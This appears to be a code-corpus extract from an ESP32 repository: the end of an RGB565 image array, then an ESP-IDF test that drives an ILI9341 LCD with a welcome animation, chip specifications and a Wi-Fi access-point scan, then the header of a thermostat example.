0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xffff, 0x4208, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xef7d, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x9cd3, 0xffff, 0x738e, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0841, 0xffff, 0xbdf7, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x39c7, 0xffdf, 0xad55, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x528a, 0xf79e, 0x528a, 0x0000, 0x0000, 0x0000,
0x0000, 0x0020, 0x94b2, 0xffff, 0xa514, 0x73ae, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bcf, 0x8c51, 0xffff, 0xad75, 0x0841, 0x0000, 0x0000,
0x0000, 0x2124, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x4a49, 0x0000, 0x0000,
0x0000, 0x6b4d, 0xffff, 0x738e, 0x2945, 0x2965, 0x2965, 0x2965, 0x2965, 0x2965, 0x4208, 0xdefb, 0x5acb, 0x2945, 0x2965, 0x2965, 0x2965, 0x2965, 0x2965, 0x2965, 0x2965, 0x2945, 0x5acb, 0xf7be, 0x5aeb, 0x2945, 0x2965, 0x2965, 0x2965, 0x2965, 0x39e7, 0xce79, 0x8430, 0x0000, 0x0000,
0x0000, 0xd6ba, 0xce59, 0x0841, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xbdf7, 0x630c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x3186, 0xd6ba, 0x0020, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x8c51, 0xe71c, 0x18c3, 0x0000,
0x0020, 0xffff, 0xa514, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x7bcf, 0xffff, 0x1082, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0020, 0xffff, 0xa514, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x632c, 0xffff, 0x3186, 0x0000,
0x0020, 0xffff, 0x9492, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xad75, 0xe71c, 0x1082, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0861, 0xa534, 0xc638, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x39e7, 0xf7be, 0x31a6, 0x0000,
0x2104, 0xffff, 0x738e, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xa534, 0xef7d, 0x52aa, 0x4228, 0x2965, 0x4208, 0x52aa, 0xdedb, 0xbdd7, 0x1082, 0x0000, 0x0000, 0x18e3, 0x18c3, 0x0000, 0x0000, 0x0000, 0x0000, 0x2124, 0xe73c, 0x4228, 0x0000,
0x3186, 0xffff, 0x630c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x8c51, 0x4a69, 0x0000, 0x0000, 0x0000, 0x0000, 0x7bef, 0xa534, 0xc638, 0xbdf7, 0xc618, 0xad75, 0x9492, 0x0000, 0x0000, 0x0000, 0x0000, 0x8c71, 0xce79, 0x630c, 0x0000, 0x0000, 0x0000, 0x18c3, 0xdefb, 0x5acb, 0x0000,
0x2104, 0xffff, 0x6b4d, 0x0000, 0x0000, 0x0000, 0x1082, 0xc618, 0xffff, 0x52aa, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x2965, 0x4208, 0x3186, 0x0020, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x3186, 0xad55, 0xffff, 0x9cd3, 0x0000, 0x0000, 0x2104, 0xe71c, 0x4a49, 0x0000,
0x0841, 0xffff, 0x8430, 0x0000, 0x0000, 0x738e, 0xf79e, 0xffff, 0x18c3, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0020, 0x3186, 0xffff, 0xbdd7, 0x0000, 0x31a6, 0xf79e, 0x31a6, 0x0000,
0x0020, 0xffff, 0xa534, 0x0000, 0x0000, 0xffdf, 0x9cf3, 0x0000, 0x0000, 0x0000, 0x0000, 0x18e3, 0x7bef, 0x0020, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0020, 0x73ae, 0x2965, 0x0000, 0x0000, 0x0000, 0x0000, 0x1082, 0x5aeb, 0x0000, 0x5acb, 0xffff, 0x31a6, 0x0000,
0x0000, 0xdefb, 0xbdf7, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xad55, 0xffff, 0x0841, 0x0000, 0x0000, 0x0000, 0x0861, 0x0000, 0x0000, 0x0000, 0x0841, 0xffff, 0xb5b6, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x8c51, 0xe73c, 0x18c3, 0x0000,
0x0000, 0x738e, 0xffff, 0x4a49, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x18e3, 0xdedb, 0x9cf3, 0x0000, 0x0000, 0x0000, 0x632c, 0xffff, 0x528a, 0x0000, 0x0000, 0x0000, 0x8430, 0xef5d, 0x2965, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0861, 0xbdd7, 0x8c71, 0x0000, 0x0000,
0x0000, 0x2124, 0xffff, 0x9492, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x7bcf, 0xffff, 0x2104, 0x0000, 0x0000, 0x0000, 0x5acb, 0xffff, 0x39e7, 0x0000, 0x0000, 0x0000, 0x2104, 0xffff, 0x8c51, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x4208, 0xffff, 0x4a69, 0x0000, 0x0000,
0x0000, 0x0841, 0xa514, 0xf79e, 0x2965, 0x0000, 0x0000, 0x0000, 0x0000, 0x2945, 0xe71c, 0xb5b6, 0x0861, 0x0000, 0x0000, 0x0000, 0x5acb, 0xffff, 0x4208, 0x0000, 0x0000, 0x0000, 0x0020, 0x9cf3, 0xf79e, 0x3186, 0x0000, 0x0000, 0x0000, 0x0000, 0xa534, 0xc618, 0x0861, 0x0000, 0x0000,
0x0000, 0x0000, 0x4208, 0xffff, 0x9cd3, 0x0000, 0x0000, 0x0000, 0x0000, 0x10a2, 0x9cd3, 0x4a49, 0x0000, 0x0000, 0x0000, 0x0000, 0x5acb, 0xffff, 0x4208, 0x0000, 0x0000, 0x0000, 0x0000, 0x39e7, 0x9cf3, 0x18e3, 0x0000, 0x0000, 0x0000, 0x39c7, 0xffff, 0x5aeb, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x9cf3, 0xffff, 0x39c7, 0x0000, 0x0000, 0x0000, 0x0000, 0x0020, 0x0020, 0x0000, 0x0000, 0x0000, 0x0000, 0x5aeb, 0xffff, 0x4228, 0x0000, 0x0000, 0x0000, 0x0000, 0x0020, 0x0020, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xce59, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0xce59, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x4228, 0xce79, 0x31a6, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xf79e, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0861, 0xd6ba, 0xffff, 0x1082, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xf7be, 0x0020, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0861, 0xce59, 0xffff, 0x6b6d, 0x0861, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x3186, 0xffff, 0xf79e, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xbdf7, 0xffff, 0xce79, 0x4228, 0x1082, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x39c7, 0x9cd3, 0xffff, 0xce59, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x632c, 0xc618, 0xffff, 0xbdf7, 0x8c51, 0x4a69, 0x18c3, 0x0000, 0x0000, 0x0000, 0x0000, 0x1082, 0x31a6, 0x7bcf, 0x9cd3, 0xffdf, 0xd6ba, 0x6b4d, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x10a2, 0x528a, 0xa534, 0xffff, 0xffff, 0xdedb, 0xc618, 0xb5b6, 0xb5b6, 0xbdf7, 0xd69a, 0xf79e, 0xffff, 0xb596, 0x5acb, 0x18e3, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0841, 0x2945, 0x2965, 0x6b4d, 0x94b2, 0xad55, 0xad75, 0x9cd3, 0x6b6d, 0x31a6, 0x2945, 0x0841, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000
};
| 49,081 | image | h | ja | c | code | {"qsc_code_num_words": 18860, "qsc_code_num_chars": 49081.0, "qsc_code_mean_word_length": 1.9242842, "qsc_code_frac_words_unique": 0.00954401, "qsc_code_frac_chars_top_2grams": 0.22757081, "qsc_code_frac_chars_top_3grams": 0.33693376, "qsc_code_frac_chars_top_4grams": 0.39289651, "qsc_code_frac_chars_dupe_5grams": 0.97591756, "qsc_code_frac_chars_dupe_6grams": 0.94326573, "qsc_code_frac_chars_dupe_7grams": 0.91708917, "qsc_code_frac_chars_dupe_8grams": 0.88722032, "qsc_code_frac_chars_dupe_9grams": 0.86407473, "qsc_code_frac_chars_dupe_10grams": 0.84674308, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.55404959, "qsc_code_frac_chars_whitespace": 0.13714065, "qsc_code_size_file_byte": 49081.0, "qsc_code_num_lines": 109.0, "qsc_code_num_chars_line_max": 1100.0, "qsc_code_num_chars_line_mean": 450.28440367, "qsc_code_frac_chars_alphabet": 0.30290437, "qsc_code_frac_chars_comments": 0.0040749, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.10784314, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.73797054, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codec_frac_lines_func_ratio": 0.0, "qsc_codec_cate_bitsstdc": 0.0, "qsc_codec_nums_lines_main": 0, "qsc_codec_frac_lines_goto": 0.0, "qsc_codec_cate_var_zero": 0.0, "qsc_codec_score_lines_no_logic": 0.0, "qsc_codec_frac_lines_print": 0.0, "qsc_codec_frac_lines_preprocessor_directives": null} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 1, "qsc_code_frac_chars_top_2grams": 1, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 1, "qsc_code_frac_chars_dupe_6grams": 1, "qsc_code_frac_chars_dupe_7grams": 1, "qsc_code_frac_chars_dupe_8grams": 1, "qsc_code_frac_chars_dupe_9grams": 1, "qsc_code_frac_chars_dupe_10grams": 1, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 1, "qsc_code_num_chars_line_mean": 1, "qsc_code_frac_chars_alphabet": 1, "qsc_code_frac_chars_digital": 1, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 1, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codec_frac_lines_func_ratio": 0, "qsc_codec_nums_lines_main": 0, "qsc_codec_score_lines_no_logic": 0, "qsc_codec_frac_lines_preprocessor_directives": 0, "qsc_codec_frac_lines_print": 0} |
0015/ESP32-OpenCV-Projects | esp32/examples/color_code/components/lcd/test/lcd_example.cpp | /* ILI9341_SPI example
This example code is in the Public Domain (or CC0 licensed, at your option.)
Unless required by applicable law or agreed to in writing, this
software is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
CONDITIONS OF ANY KIND, either express or implied.
*/
/*
Some info about the ILI9341: It has an C/D line, which is connected to a GPIO here. It expects this
line to be low for a command and high for data. We use a pre-transmit callback to control that line
every transaction has as the user-definable argument the needed state of the D/C line and just
before the transaction is sent, the callback will set this line to the correct state.
Note: If not using ESP WROVER KIT, Users must change the pins by setting macro in file spi_ili.c
To change the fonts style include the header of your desired font from the "component/includes" folder
and simply pass the address of its GFXfont to setFont API
*/
/*C Includes*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*RTOS Includes*/
#include "freertos/FreeRTOS.h"
#include "freertos/task.h"
#include "freertos/event_groups.h"
#include "freertos/semphr.h"
/*SPI Includes*/
#include "driver/spi_master.h"
#include "iot_lcd.h"
#include "Adafruit_GFX.h"
#include "image.h"
#include "nvs_flash.h"
#include "esp_wifi.h"
#include "esp_log.h"
#include "esp_system.h"
#include "esp_event_loop.h"
/*Include desired font here*/
#define PROGMEM
#include "FreeSans9pt7b.h"
#include "unity.h"
static CEspLcd* lcd_obj = NULL;
wifi_scan_config_t scan_config = {
.ssid = 0,
.bssid = 0,
.channel = 0,
.show_hidden = true,
.scan_type = WIFI_SCAN_TYPE_ACTIVE,
.scan_time = {
.passive = 0,
},
};
const int CONNECTED_BIT = BIT0;
/* FreeRTOS event group to signal when we are connected & ready to make a request */
static EventGroupHandle_t wifi_event_group;
/*EVT handler for Wifi status*/
extern "C" esp_err_t event_handler(void *ctx, system_event_t *event)
{
switch (event->event_id) {
case SYSTEM_EVENT_STA_START:
esp_wifi_connect();
break;
case SYSTEM_EVENT_STA_GOT_IP:
xEventGroupSetBits(wifi_event_group, CONNECTED_BIT);
break;
case SYSTEM_EVENT_STA_DISCONNECTED:
/* This is a workaround as ESP32 WiFi libs don't currently
auto-reassociate. */
esp_wifi_connect();
xEventGroupClearBits(wifi_event_group, CONNECTED_BIT);
break;
default:
break;
}
return ESP_OK;
}
extern "C" void esp_draw()
{
/*Initilize ESP32 to scan for Access points*/
nvs_flash_init();
tcpip_adapter_init();
wifi_event_group = xEventGroupCreate();
ESP_ERROR_CHECK( esp_event_loop_init(event_handler, NULL) );
wifi_init_config_t cfg = WIFI_INIT_CONFIG_DEFAULT();
ESP_ERROR_CHECK( esp_wifi_init(&cfg) );
ESP_ERROR_CHECK( esp_wifi_set_storage(WIFI_STORAGE_RAM) );
ESP_ERROR_CHECK( esp_wifi_set_mode(WIFI_MODE_STA) );
ESP_ERROR_CHECK( esp_wifi_start() );
/*Initialize LCD*/
lcd_conf_t lcd_pins = {
.lcd_model = LCD_MOD_AUTO_DET,
.pin_num_miso = GPIO_NUM_25,
.pin_num_mosi = GPIO_NUM_23,
.pin_num_clk = GPIO_NUM_19,
.pin_num_cs = GPIO_NUM_22,
.pin_num_dc = GPIO_NUM_21,
.pin_num_rst = GPIO_NUM_18,
.pin_num_bckl = GPIO_NUM_5,
.clk_freq = 20 * 1000 * 1000,
.rst_active_level = 0,
.bckl_active_level = 0,
.spi_host = HSPI_HOST,
.init_spi_bus = true,
};
if (lcd_obj == NULL) {
lcd_obj = new CEspLcd(&lcd_pins);
}
printf("lcd id: 0x%08x\n", lcd_obj->id.id);
/*Welcome screen*/
int x = 0, y = 0;
int dim = 6;
uint16_t rand_color;
lcd_obj->setRotation(3);
for (int i = 0; i < dim; i++) {
for (int j = 0; j < 10 - 2 * i; j++) {
rand_color = rand();
lcd_obj->fillRect(x * 32, y * 24, 32, 24, rand_color);
ets_delay_us(20000);
x++;
}
x--;
for (int j = 0; j < 10 - 2 * i; j++) {
rand_color = rand();
lcd_obj->fillRect(x * 32, y * 24, 32, 24, rand_color);
ets_delay_us(20000);
y++;
}
y--;
for (int j = 0; j < 10 - 2 * i - 1; j++) {
rand_color = rand();
lcd_obj->fillRect(x * 32, y * 24, 32, 24, rand_color);
ets_delay_us(20000);
x--;
}
x++;
for (int j = 0; j < 10 - 2 * i - 1; j++) {
rand_color = rand();
lcd_obj->fillRect((x - 1) * 32, y * 24, 32, 24, rand_color);
ets_delay_us(20000);
y--;
}
y++;
}
vTaskDelay(1000 / portTICK_PERIOD_MS);
/*ESPecifications*/
lcd_obj->setRotation(2);
lcd_obj->fillScreen(COLOR_ESP_BKGD);
lcd_obj->setTextSize(1);
lcd_obj->drawBitmap(0, 0, esp_logo, 137, 26);
lcd_obj->setTextColor(COLOR_GREEN, COLOR_ESP_BKGD);
lcd_obj->setFont(&FreeSans9pt7b);
lcd_obj->drawString("CPU", 3, 40);
lcd_obj->setFont(NULL);
lcd_obj->setTextColor(COLOR_YELLOW, COLOR_ESP_BKGD);
lcd_obj->drawString("Xtensa Dual-Core 32-bit LX6 MPU", 3, 50);
lcd_obj->drawString("Max Clock Speed at 240 MHz & 600 DMIPS ", 3, 60);
lcd_obj->drawString("at up to 600 DMIPS", 3, 70);
lcd_obj->drawString("Memory: 520 KiB SRAM", 3, 80);
lcd_obj->setTextColor(COLOR_GREEN, COLOR_ESP_BKGD);
lcd_obj->setFont(&FreeSans9pt7b);
lcd_obj->drawString("Wireless connectivity", 3, 110);
lcd_obj->setFont(NULL);
lcd_obj->setTextColor(COLOR_YELLOW, COLOR_ESP_BKGD);
lcd_obj->drawString("Wi-Fi: 802.11 b/g/n/e/i", 3, 120);
lcd_obj->drawString("Bluetooth: v4.2 BR/EDR and BLE", 3, 130);
lcd_obj->setTextColor(COLOR_GREEN, COLOR_ESP_BKGD);
lcd_obj->setFont(&FreeSans9pt7b);
lcd_obj->drawString("Power Management", 3, 160);
lcd_obj->setFont(NULL);
lcd_obj->setTextColor(COLOR_YELLOW, COLOR_ESP_BKGD);
lcd_obj->drawString("Internal LDO", 3, 170);
lcd_obj->drawString("Individual power domain for RTC", 3, 180);
lcd_obj->drawString("5uA deep sleep current", 3, 190);
lcd_obj->drawString("Wake up from GPIO interrupt" , 3, 200);
lcd_obj->drawString("Wake up from timer, ADC measurements", 3, 210);
lcd_obj->drawString("Wake up from capacitive sensor intr", 3, 220);
lcd_obj->setTextColor(COLOR_GREEN, COLOR_ESP_BKGD);
lcd_obj->setFont(&FreeSans9pt7b);
lcd_obj->drawString("Security", 3, 250);
lcd_obj->setFont(NULL);
lcd_obj->setTextColor(COLOR_YELLOW, COLOR_ESP_BKGD);
lcd_obj->drawString("IEEE 802.11 standard security features", 3, 260);
lcd_obj->drawString("Secure boot & Flash Encryption", 3, 270);
lcd_obj->drawString("Cryptographic Hardware Acceleration", 3, 280);
lcd_obj->drawString("AES, RSA, SHA-2, EEC, RNG", 3, 290);
lcd_obj->drawString("1024-bit OTP", 3, 300);
vTaskDelay(4000 / portTICK_PERIOD_MS);
lcd_obj->fillRect(0, 28, 240, 320, COLOR_ESP_BKGD);
lcd_obj->setTextColor(COLOR_GREEN, COLOR_ESP_BKGD);
lcd_obj->setFont(&FreeSans9pt7b);
lcd_obj->drawString("Peripheral Interfaces", 3, 40);
lcd_obj->setFont(NULL);
lcd_obj->setTextColor(COLOR_YELLOW, COLOR_ESP_BKGD);
lcd_obj->drawString("12-bit DAC, 18 channels", 3, 50);
lcd_obj->drawString("8-bit DAC, 2 channels", 3, 60);
lcd_obj->drawString("SPI, 4 channels", 3, 70);
lcd_obj->drawString("I2S, 4 channels", 3, 80);
lcd_obj->drawString("I2C, 2 channels", 3, 90);
lcd_obj->drawString("UART, 3 channels", 3, 100);
lcd_obj->drawString("SD/SDIO/MMC Host", 3, 110);
lcd_obj->drawString("SDIO/SPI Slave", 3, 120);
lcd_obj->drawString("Ethernet MAC with DMA & IEEE 1588", 3, 130);
lcd_obj->drawString("CAN bus 2.0", 3, 140);
lcd_obj->drawString("IR/RMT (Tx/Rx)", 3, 150);
lcd_obj->drawString("Motor PWM", 3, 160);
lcd_obj->drawString("LED PWM, 16 channels", 3, 170);
lcd_obj->drawString("Ultra Low Power Analog Pre-Amp", 3, 180);
lcd_obj->drawString("Hall Effect Sensor", 3, 190);
lcd_obj->drawString("Capacitive Touch Sense, 10 channels", 3, 200);
lcd_obj->drawString("Temperature Sensor", 3, 210);
vTaskDelay(4000 / portTICK_PERIOD_MS);
lcd_obj->fillScreen(COLOR_ESP_BKGD);
lcd_obj->drawBitmap(0, 0, esp_logo, 137, 26);
lcd_obj->drawRoundRect(0, 0, 240, 320, 3, COLOR_WHITE);
lcd_obj->drawFastHLine(0, 25, 320, COLOR_WHITE);
lcd_obj->setTextColor(COLOR_WHITE, COLOR_ESP_BKGD);
lcd_obj->drawString("Wifi-scan", 180, 10);
lcd_obj->setFont(&FreeSans9pt7b);
lcd_obj->drawString("AP Name", 10, 50);
lcd_obj->drawString("RSSI", 180, 50);
lcd_obj->setFont(NULL);
ESP_ERROR_CHECK(esp_wifi_scan_start(&scan_config, true));
uint16_t ap_num = 20;
wifi_ap_record_t ap_records[20];
ESP_ERROR_CHECK(esp_wifi_scan_get_ap_records(&ap_num, ap_records));
printf("Found %d access points:\n", ap_num);
/*Print 10 of them on the screen*/
for (uint8_t i = 0; i < ap_num; i++) {
lcd_obj->drawNumber(i + 1, 10, 60 + (i * 10));
lcd_obj->setTextColor(COLOR_YELLOW, COLOR_ESP_BKGD);
lcd_obj->drawString((char *) ap_records[i].ssid, 30, 60 + (i * 10));
lcd_obj->setTextColor(COLOR_GREEN, COLOR_ESP_BKGD);
lcd_obj->drawNumber(100 + ap_records[i].rssi, 200, 60 + (i * 10));
}
vTaskDelay(2000 / portTICK_PERIOD_MS);
}
TEST_CASE("LCD cpp test", "[lcd][iot]")
{
esp_draw();
}
| 10,055 | lcd_example | cpp | en | cpp | code | {"qsc_code_num_words": 1415, "qsc_code_num_chars": 10055.0, "qsc_code_mean_word_length": 4.1335689, "qsc_code_frac_words_unique": 0.30671378, "qsc_code_frac_chars_top_2grams": 0.09027184, "qsc_code_frac_chars_top_3grams": 0.11762694, "qsc_code_frac_chars_top_4grams": 0.04103266, "qsc_code_frac_chars_dupe_5grams": 0.35595828, "qsc_code_frac_chars_dupe_6grams": 0.29184476, "qsc_code_frac_chars_dupe_7grams": 0.24705078, "qsc_code_frac_chars_dupe_8grams": 0.22687639, "qsc_code_frac_chars_dupe_9grams": 0.21627629, "qsc_code_frac_chars_dupe_10grams": 0.21627629, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.05923439, "qsc_code_frac_chars_whitespace": 0.25957235, "qsc_code_size_file_byte": 10055.0, "qsc_code_num_lines": 271.0, "qsc_code_num_chars_line_max": 104.0, "qsc_code_num_chars_line_mean": 37.10332103, "qsc_code_frac_chars_alphabet": 0.72639355, "qsc_code_frac_chars_comments": 0.13585281, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.29186603, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.13226661, "qsc_code_frac_chars_long_word_length": 0.00264763, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codecpp_frac_lines_preprocessor_directives": 0.09090909, "qsc_codecpp_frac_lines_func_ratio": 0.01435407, "qsc_codecpp_cate_bitsstdc": 0.0, "qsc_codecpp_nums_lines_main": 0.0, "qsc_codecpp_frac_lines_goto": 0.0, "qsc_codecpp_cate_var_zero": 0.0, "qsc_codecpp_score_lines_no_logic": 0.10526316, "qsc_codecpp_frac_lines_print": 0.00956938} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codecpp_frac_lines_func_ratio": 0, "qsc_codecpp_nums_lines_main": 0, "qsc_codecpp_score_lines_no_logic": 0, "qsc_codecpp_frac_lines_preprocessor_directives": 0, "qsc_codecpp_frac_lines_print": 0} |
0015/ESP32-OpenCV-Projects | esp32/examples/color_code/components/lcd/test/lcd_thermostat.cpp | /* ILI9341_SPI example
This example code is in the Public Domain (or CC0 licensed, at your option.)
Unless required by applicable law or agreed to in writing, this
software is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
CONDITIONS OF ANY KIND, either express or implied.
*/
/*
Some info about the ILI9341: It has an C/D line, which is connected to a GPIO here. It expects this
line to be low for a command and high for data. We use a pre-transmit callback to control that line
every transaction has as the user-definable argument the needed state of the D/C line and just
before the transaction is sent, the callback will set this line to the correct state.
Note: If not using ESP WROVER KIT, Users must change the pins by setting macro in file spi_ili.c
To change the fonts style include the header of your desired font from the "component/includes" folder
and simply pass the address of its GFXfont to setFont API
*/
/*C Includes*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*RTOS Includes*/
#include "freertos/FreeRTOS.h"
#include "freertos/task.h"
#include "freertos/event_groups.h"
#include "freertos/semphr.h"
